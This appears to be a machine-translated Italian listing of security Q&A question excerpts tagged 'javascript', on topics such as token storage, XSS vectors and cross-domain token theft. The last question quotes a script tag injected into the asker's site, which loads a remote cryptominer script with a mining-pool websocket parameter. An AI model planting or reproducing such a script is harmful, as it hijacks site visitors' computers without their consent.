Domande con tag 'javascript'

domande con tag
0
risposte

Difetti di sicurezza durante l'archiviazione del token di accesso automatico

Devo eseguire l'accesso automatico con un token sul mio sito web. Il token viene generato sul back-end, sul front-end (applicazione a singola pagina) Devo memorizzare il token in modo sicuro. Uso canali protetti (HTTPS e WSS). Potresti su...
posta 11.04.2016 - 14:05
2
risposte

Accedere ai servizi LAN tramite una pagina Web dannosa

Supponiamo che un utente di una rete aziendale abbia accesso a un server FTP privato o intranet, disponibile solo sulla rete locale, disponibile all'indirizzo link . Se un utente malintenzionato ottiene da questo utente la visualizzazione di un...
posta 03.11.2015 - 07:52
0
risposte

Codifica dei payload per GWT versione 7

Sto verificando un sito web creato con Google Web Toolkit. Utilizza la serializzazione versione 7, quindi gli strumenti di GDS Security non funzioneranno (funzionano solo fino alla versione 5). Usando questa tecnica ho ottenuto tutte le classi,...
posta 14.02.2016 - 21:21
2
risposte

Con javascript nel browser, come posso firmare alcuni dati senza manipolare direttamente una chiave privata?

Con JavaScript nel browser, ho bisogno di firmare digitalmente alcuni dati. Sto guardando il nuovo Crypto.Subtle api , in particolare il segno ( ) e importKey() metodi. Voglio, molto ragionevolmente, ritenere di installare un certificato s...
posta 16.09.2015 - 12:27
0
risposte

Sicurezza WCF di ASP.NET, javascript e gestione delle informazioni sensibili

Mi sono imbattuto in quella che chiamerei una "cattiva" codifica javascript (provengo da un mondo di KnockoutJS / Angular / Web API) in cui i servizi WCF sono esposti a javascript dagli URL di produzione, ovvero "productionserver.com .WCFService...
posta 17.04.2015 - 23:23
3
risposte

Quali sono le tecniche di attacco del malware JS?

Il codice JavaScript malevolo (generato da codice PHP ospitato malintenzionato, ad esempio) può portare ad attacchi. Quali sono i tipi di attacco che il javascript dannoso potrebbe eseguire? Il download drive-by attacca solo quelli che esegue ja...
posta 30.07.2014 - 10:29
0
risposte

Vettori XSS per nuova immagine ()

Quali sono i possibili vettori XSS per questo codice JavaScript new Image().src = encodeURI('[user url here]'); Supponiamo due casi: [user url here] è una stringa fornita dall'utente (senza convalida) [user url here] è un...
posta 12.06.2014 - 21:58
1
risposta

Quando un'estensione del browser o uno script utente estrae un file JS dal CDN di Google, in che modo questo compromette la privacy dell'utente in termini di portata di Google? [duplicare]

Il contesto da cui è sorta la mia domanda è questo script utente che rimuove localmente gli annunci da Ixquick.com , che è un motore di ricerca" proxy "anonimo che fornisce i risultati dall'indice di Google senza fornire le tue informazioni...
posta 12.07.2013 - 20:43
1
risposta

È possibile ottenere un flash src dopo un reindirizzamento o un elemento all'interno di un tag embed / object / iframe (cross-domain)?

L'URL example.com/auth reindirizzerà automaticamente l'utente (HTTP 302) a example.com/signed_in.SWF?token=SENSITIVE. È possibile che un utente malintenzionato rubi il token, utilizzando javascript o flash, nell'esempio seguente? Come? <...
posta 28.08.2015 - 22:57
1
risposta

Injected Javascript nel mio documento HTML

Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptok...
posta 08.06.2018 - 12:13